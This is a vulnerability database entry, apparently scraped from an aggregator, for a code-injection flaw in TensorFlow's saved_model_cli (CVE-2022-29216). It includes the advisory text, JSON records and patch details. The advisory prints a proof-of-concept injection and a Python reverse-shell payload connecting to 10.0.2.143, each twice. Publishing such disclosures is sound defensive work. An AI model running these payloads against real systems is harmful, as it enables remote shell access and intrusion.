        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-05-21T00:15:11.980",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-94"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-75c9-jrh4-79mc

Vulnerability from github

Published

2022-05-24 22:16

Modified

2022-06-06 18:13

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Code injection in `saved_model_cli` in TensorFlow

Details

Impact

TensorFlow's saved_model_cli tool is vulnerable to a code injection:

saved_model_cli run --input_exprs 'x=print("malicious code to run")' --dir ./ --tag_set serve --signature_def serving_default

This can be used to open a reverse shell

saved_model_cli run --input_exprs 'hello=exec("""\nimport socket\nimport subprocess\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("10.0.2.143",33419))\nsubprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())""")' --dir ./ --tag_set serve --signature_def serving_default

This is because the fix for CVE-2021-41228 was incomplete. Under certain code paths it still allows unsafe execution:

```python def preprocess_input_exprs_arg_string(input_exprs_str, safe=True): # ...

for input_raw in filter(bool, input_exprs_str.split(';')): # ... if safe: # ... else: # ast.literal_eval does not work with numpy expressions input_dict[input_key] = eval(expr) # pylint: disable=eval-used return input_dict ```

This code path was maintained for compatibility reasons as we had several test cases where numpy expressions were used as arguments.

However, given that the tool is always run manually, the impact of this is still not severe. We have now removed the safe=False argument, so all parsing is done withough calling eval.

Patches

We have patched the issue in GitHub commit c5da7af048611aa29e9382371f0aed5018516cac.

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Andey Robins from the Cybersecurity Education and Research Lab in the Department of Computer Science at the University of Wyoming.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-29216"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-24T22:16:48Z",
    "nvd_published_at": "2022-05-21T00:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nTensorFlow\u0027s `saved_model_cli` tool is vulnerable to a code injection:\n\n```\nsaved_model_cli run --input_exprs \u0027x=print(\"malicious code to run\")\u0027 --dir ./\n--tag_set serve --signature_def serving_default\n```\n\nThis can be used to open a reverse shell                                      \n\n```\nsaved_model_cli run --input_exprs \u0027hello=exec(\"\"\"\\nimport socket\\nimport\nsubprocess\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\"10.0.2.143\",33419))\\nsubprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())\"\"\")\u0027\n--dir ./ --tag_set serve --signature_def serving_default\n```\n\nThis is because [the fix](https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7) for [CVE-2021-41228](https://nvd.nist.gov/vuln/detail/CVE-2021-41228) was incomplete. Under [certain code paths](https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574) it still allows unsafe execution:\n\n```python\ndef preprocess_input_exprs_arg_string(input_exprs_str, safe=True):\n  # ...\n\n  for input_raw in filter(bool, input_exprs_str.split(\u0027;\u0027)):\n    # ...\n    if safe:\n      # ...\n    else:\n      # ast.literal_eval does not work with numpy expressions\n      input_dict[input_key] = eval(expr)  # pylint: disable=eval-used\n  return input_dict\n```\n\nThis code path was maintained for compatibility reasons as we had several test cases where numpy expressions were used as arguments.\n\nHowever, given that the tool is always run manually, the impact of this is still not severe. We have now removed the `safe=False` argument, so all parsing is done withough calling `eval`.\n\n### Patches\nWe have patched the issue in GitHub commit [c5da7af048611aa29e9382371f0aed5018516cac](https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac).\n\nThe fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Andey Robins from the Cybersecurity Education and Research Lab in the Department of Computer Science at the University of Wyoming.",
  "id": "GHSA-75c9-jrh4-79mc",
  "modified": "2022-06-06T18:13:28Z",
  "published": "2022-05-24T22:16:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-75c9-jrh4-79mc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29216"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/c5da7af048611aa29e9382371f0aed5018516cac"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tensorflow/tensorflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/python/tools/saved_model_cli.py#L566-L574"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Code injection in `saved_model_cli` in TensorFlow"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2022-29216 (GCVE-0-2022-29216)

Vulnerability from cvelistv5

gsd-2022-29216

Vulnerability from gsd

fkie_cve-2022-29216

Vulnerability from fkie_nvd

ghsa-75c9-jrh4-79mc

Vulnerability from github

Impact

Patches

For more information

Attribution

Tags

Sightings

Nomenclature